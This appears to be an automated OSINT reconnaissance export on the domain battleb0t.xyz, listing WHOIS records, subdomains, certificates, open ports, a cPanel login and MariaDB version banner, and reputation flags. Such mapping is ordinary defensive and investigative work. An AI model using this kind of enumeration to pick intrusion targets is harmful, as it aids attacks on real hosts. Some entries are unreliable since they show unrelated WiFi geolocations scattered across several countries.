Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c529effee343669-FRA
Content-Encoding: gzip
| 172.67.168.252 |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 5 | 0 | 2 | 0 | None | +74955801111 | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:01:39 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.170): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SLK-Routers_091850 (Net ID: 00:02:2A:09:18:50) | 37.7642, -122.3993 |
| 2023-05-12 02:53:12 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 3 | 0 | None | None None | panel.battleb0t.xyz |
| 2023-05-12 02:54:21 | Linked URL - Internal | No | Web Spider | 2 | 0 | 3 | 0 | None | http://vscode.battleb0t.xyz/ | vscode.battleb0t.xyz |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Catwoman (Net ID: 00:14:5C:89:45:BC) | 50.8897, 6.0563 |
| 2023-05-12 02:55:11 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Persistent_Auth": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Host": "DISPLAY_UTF8", "Www_Authenticate": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Persistent_Auth": ["false"], "Expires": ["Fri, 01 Jan 1990 00:00:00 GMT"], "Vary": ["Accept-Encoding"], "Connection": ["close"], "Server": ["cPanel"], "Host": ["87.248.157.102:2078"], "Www_Authenticate": ["Basic realm=\"Restricted Area\""], "Content_Type": ["text/html; charset=\"utf-8\""], "Date": ["<REDACTED>"], "Cache_Control": ["no-cache, no-store, must-revalidate, private"]} | 87.248.157.102 |
| 2023-05-12 03:10:18 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 4 | 0 | None | VOIPBL Publicly Accessible PBX List [34.74.160.0/20]
http://www.voipbl.org/update | 34.74.160.0/20 |
| 2023-05-12 03:13:05 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [002evapey.github.io]
https://www.openphish.com/feed.txt | 002evapey.github.io |
| 2023-05-12 02:45:48 | Physical Coordinates | No | AbstractAPI | 91 | 0 | 2 | 0 | None | 41.8781, -87.6298 | 104.21.6.166 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Rock Chalk (Net ID: 00:01:95:08:D8:04) | 37.7813933,-122.3918002 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=5wRiK8by2KiigHlJJ8noI6lNWOYgr9ak0HIrPyPmGPMwmKjHbETJvR65ezUzo71EC3GA4BfzhzY9gQo4xaqCIHUyEDhgk9fWUlDfKgViUJ%2BMTfsujmxXQsTRpQ%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:13 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6036feab195d-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:25 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | Flickr (Category: images)
https://www.flickr.com/photos/Altpapier/ | Altpapier |
| 2023-05-12 03:10:10 | Malicious IP on Same Subnet | Yes | VoIPBL OpenPBX IPs | 0 | 0 | 3 | 0 | None | VOIPBL Publicly Accessible PBX List [185.199.109.0/24]
http://www.voipbl.org/update | 185.199.109.0/24 |
| 2023-05-12 02:45:10 | Internet Name | No | Hybrid Analysis | 0 | 0 | 1 | 0 | None | kekw.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 02:44:26 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:74:c7:69:09:be:bf:85:53:83:95:0e:84:5e:23:6b:8f:95
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Mar 27 17:04:53 2023 GMT
Not After : Jun 25 17:04:52 2023 GMT
Subject: CN=nwapi.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:c0:92:2b:06:a8:76:be:87:ad:a1:7a:9e:5a:24:
59:36:93:77:df:2f:5f:ec:5d:f8:39:5c:9e:e9:bb:
24:38:91:de:54:5b:7a:21:bd:81:66:b9:f4:29:4c:
2b:fa:57:13:7e:92:b4:15:86:67:29:e9:3d:cd:52:
95:9b:57:3a:5d:e6:e9:45:19:f1:e0:94:39:75:06:
2b:76:17:5a:3c:dc:eb:34:5d:2b:11:01:60:df:20:
e3:b5:60:cd:32:82:ad:56:26:62:d5:06:6e:b6:fa:
a5:d9:a5:4d:79:33:21:15:51:a2:c0:48:15:37:c6:
91:2f:b2:2e:7d:a0:75:7f:50:14:78:92:5d:14:20:
37:35:75:05:53:06:c4:4c:79:be:57:44:4e:7f:9a:
50:6f:84:ce:99:6c:50:c4:25:b5:3b:28:ef:3d:1e:
0d:f1:c2:fb:f7:a2:98:40:97:4e:a6:29:13:ba:fe:
a3:fd:ca:b9:fd:ab:de:51:93:45:07:f4:be:76:56:
10:d6:f8:44:07:0f:8a:0a:1d:0b:2a:3e:ea:d3:77:
c7:f9:17:20:d7:71:23:2b:a0:8f:f4:4a:f3:e4:d4:
5a:5c:2d:ce:df:b4:a0:a0:ac:d7:ab:d8:92:f0:4a:
4c:07:6e:72:26:57:04:a7:82:b9:f3:2d:17:4e:50:
36:d2:94:d7:69:b9:6a:7a:3a:20:4d:5d:1e:75:6c:
84:96:b6:c4:70:f4:80:b9:d6:06:45:7a:52:b8:0e:
0e:2d:fd:2c:dc:22:9b:06:83:b7:ce:89:98:50:8a:
98:25:5c:fe:f2:ac:51:29:2f:08:c4:ff:27:4b:06:
5c:49:dd:d3:39:da:b3:60:fe:da:c7:a0:9e:e7:45:
85:7c:70:41:16:a9:f0:27:f6:98:d1:7c:9f:af:81:
f4:37:0b:12:28:d5:35:6a:e6:e2:66:3b:e1:11:5b:
6a:d4:8d:47:d6:44:64:d5:a9:fc:83:71:f4:46:8c:
69:8f:3e:2f:32:4d:8a:48:3b:ac:ac:88:a4:94:ea:
b5:b5:92:f4:63:d9:95:76:ef:6d:8e:2f:15:8a:59:
65:d3:00:6a:ca:d7:56:11:cf:5f:a7:d4:3d:48:6a:
5d:dd:87:ce:8c:d0:6e:15:cf:fb:5f:c0:02:33:50:
4e:36:37:09:f4:b7:06:18:07:a3:00:b5:58:4a:d2:
bc:0d:0b:5d:96:5b:4e:aa:75:b7:e9:a2:ce:90:ad:
d7:25:96:7f:66:7d:4e:03:23:c1:16:bc:0c:09:9d:
d4:bf:8c:7c:19:2d:8b:39:0c:89:5a:15:97:34:34:
1c:7b:5d:34:19:a2:d0:cb:f4:5c:b0:48:d7:c9:6c:
5d:09:b3
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
1F:80:B0:A7:B9:49:16:0F:27:7B:7C:B9:F5:38:B5:3D:C9:3C:2F:40
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nwapi.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Mar 27 18:04:53.353 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:C2:49:4E:83:B3:46:DC:0B:F2:4C:E0:
2C:BD:3A:21:A9:D3:87:F4:AC:B5:4F:45:81:1D:09:75:
FB:9B:D3:9E:A5:02:20:54:1A:EC:0B:6C:62:AB:8A:0B:
14:2D:42:2F:00:E8:AD:FF:98:7D:A9:48:C3:5C:9D:C9:
A1:63:83:E1:17:D2:4C
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : E8:3E:D0:DA:3E:F5:06:35:32:E7:57:28:BC:89:6B:C9:
03:D3:CB:D1:11:6B:EC:EB:69:E1:77:7D:6D:06:BD:6E
Timestamp : Mar 27 18:04:53.360 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:45:02:21:00:8C:E5:2C:49:4A:30:97:4C:B4:E6:F3:
86:6A:09:B6:EF:84:21:66:BD:9C:17:9A:88:7C:B9:2A:
4D:1D:CC:99:A2:02:20:13:E4:A1:38:F5:80:6B:55:F9:
DB:4D:54:23:A0:D3:2F:61:E4:B8:03:26:A2:87:C1:4D:
B4:9F:8A:D7:F3:2F:04
Signature Algorithm: sha256WithRSAEncryption
|
| 2023-05-12 03:09:27 | Co-Hosted Site | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | cdnjs.cloudflare.com | 188.114.96.1 |
| 2023-05-12 02:45:45 | Physical Coordinates | No | AbstractAPI | 0 | 0 | 2 | 0 | None | 37.751, -97.822 | 2606:50c0:8000::153 |
| 2023-05-12 02:44:37 | SSL Certificate - Raw Data | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:ad:f5:1d:5c:40:76:9e:09:db:d3:8c:1d:cb:38:82:95:b4
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Nov 17 13:21:02 2022 GMT
Not After : Feb 15 13:21:01 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
7C:D7:88:7D:40:F1:30:F4:3D:4A:35:FE:C7:60:54:0A:C7:C3:45:D3
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Nov 17 14:21:02.487 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Nov 17 14:21:02.999 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| battleb0t.xyz |
| 2023-05-12 03:01:36 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.132): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 02:45:46 | Physical Location | No | AbstractAPI | 0 | 0 | 2 | 0 | None | Chantilly, Virginia, 20151, United States, North America | 2606:50c0:8003::153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | RTL8186-GW (Net ID: 00:0E:E8:DC:15:E1) | 40.2024, 29.0398 |
| 2023-05-12 02:54:21 | Web Content | No | Web Spider | 3 | 0 | 3 | 0 | None | <!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->
<!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->
<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]-->
<head>
<title>vscode.battleb0t.xyz | 521: Web server is down</title>
<meta charset="UTF-8" />
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=Edge" />
<meta name="robots" content="noindex, nofollow" />
<meta name="viewport" content="width=device-width,initial-scale=1" />
<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/main.css" />
</head>
<body>
<div id="cf-wrapper">
<div id="cf-error-details" class="p-0">
<header class="mx-auto pt-10 lg:pt-6 lg:px-8 w-240 lg:w-full mb-8">
<h1 class="inline-block sm:block sm:mb-2 font-light text-60 lg:text-4xl text-black-dark leading-tight mr-2">
<span class="inline-block">Web server is down</span>
<span class="code-label">Error code 521</span>
</h1>
<div>
Visit <a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" target="_blank" rel="noopener noreferrer">cloudflare.com</a> for more information.
</div>
<div class="mt-3">2023-05-12 02:54:21 UTC</div>
</header>
<div class="my-8 bg-gradient-gray">
<div class="w-240 lg:w-full mx-auto">
<div class="clearfix md:px-8">
<div id="cf-browser-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-browser block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">You</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Browser
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-cloudflare-status" class=" relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
<span class="cf-icon-cloud block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-ok w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</a>
</div>
<span class="md:block w-full truncate">Newark</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
<a href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" target="_blank" rel="noopener noreferrer">
Cloudflare
</a>
</h3>
<span class="leading-1.3 text-2xl text-green-success">Working</span>
</div>
<div id="cf-host-status" class="cf-error-source relative w-1/3 md:w-full py-15 md:p-0 md:py-8 md:text-left md:border-solid md:border-0 md:border-b md:border-gray-400 overflow-hidden float-left md:float-none text-center">
<div class="relative mb-10 md:m-0">
<span class="cf-icon-server block md:hidden h-20 bg-center bg-no-repeat"></span>
<span class="cf-icon-error w-12 h-12 absolute left-1/2 md:left-auto md:right-0 md:top-0 -ml-6 -bottom-4"></span>
</div>
<span class="md:block w-full truncate">vscode.battleb0t.xyz</span>
<h3 class="md:inline-block mt-3 md:mt-0 text-2xl text-gray-600 font-light leading-1.3">
Host
</h3>
<span class="leading-1.3 text-2xl text-red-error">Error</span>
</div>
</div>
</div>
</div>
<div class="w-240 lg:w-full mx-auto mb-8 lg:px-8">
<div class="clearfix">
<div class="w-1/2 md:w-full float-left pr-6 md:pb-10 md:pr-0 leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What happened?</h2>
<p>The web server is not returning a connection. As a result, the web page is not displaying.</p>
</div>
<div class="w-1/2 md:w-full float-left leading-relaxed">
<h2 class="text-3xl font-normal leading-1.3 mb-4">What can I do?</h2>
<h3 class="text-15 font-semibold mb-2">If you are a visitor of this website:</h3>
<p class="mb-6">Please try again in a few minutes.</p>
<h3 class="text-15 font-semibold mb-2">If you are the owner of this website:</h3>
<p><span>Contact your hosting provider letting them know your web server is not responding.</span> <a rel="noopener noreferrer" href="https://support.cloudflare.com/hc/en-us/articles/200171916-Error-521">Additional troubleshooting information</a>.</p>
</div>
</div>
</div>
<div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:text-left border-solid border-0 border-t border-gray-300">
<p class="text-13">
<span class="cf-footer-item sm:block sm:mb-1">Cloudflare Ray ID: <strong class="font-semibold">7c5f606679610ce9</strong></span>
<span class="cf-footer-separator sm:hidden">•</span>
<span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1">
Your IP:
<button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button>
<span class="hidden" id="cf-footer-ip">138.197.106.3</span>
<span class="cf-footer-separator sm:hidden">•</span>
</span>
<span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing?utm_source=errorcode_521&utm_campaign=vscode.battleb0t.xyz" id="brand_link" target="_blank">Cloudflare</a></span>
</p>
<script>(function(){function d(){var b=a.getElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}var a=document;document.addEventListener&&a.addEventListener("DOMContentLoaded",d)})();</script>
</div><!-- /.error-footer -->
</div>
</div>
</body>
</html>
| vscode.battleb0t.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | referrer-policy: strict-origin-when-cross-origin | {"nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "x-content-type-options": "nosniff", "content-encoding": "gzip", "transfer-encoding": "chunked", "cf-cache-status": "MISS", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "keep-alive", "etag": "W/\"8c335e8962efa39b56919d96c0b5527b\"", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=sZlRfK%2B18hvKHsoLJ40BkYB4lHX60aBHph6G1vTBEuSHhMJnpf00BL3raGeVno%2B26HQG4%2BW6ctKHKalYOpr00wtWKpk2uf4%2BwHegHXg02iluCPfF38%2B%2FPJX8%2B4PjVD4UW5HjHU9e\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cache-control": "public, max-age=14400, must-revalidate", "date": "Fri, 12 May 2023 02:54:19 GMT", "access-control-allow-origin": "*", "referrer-policy": "strict-origin-when-cross-origin", "content-type": "application/javascript", "cf-ray": "7c5f605affff189d-EWR"} |
| 2023-05-12 02:53:32 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 185.199.111.153:80 | 185.199.111.153 |
| 2023-05-12 02:46:00 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | | 185.199.111.153 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 1 | 2 | 0 | None | 5.5.5-10.5.19-MariaDB | 87.248.157.102 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | default (Net ID: 00:03:2F:06:53:C3) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D"}],"group":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:44 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.227): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:28:06 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.144:443 | 188.114.96.0/24 |
| 2023-05-12 02:50:40 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | | 185.199.108.153 |
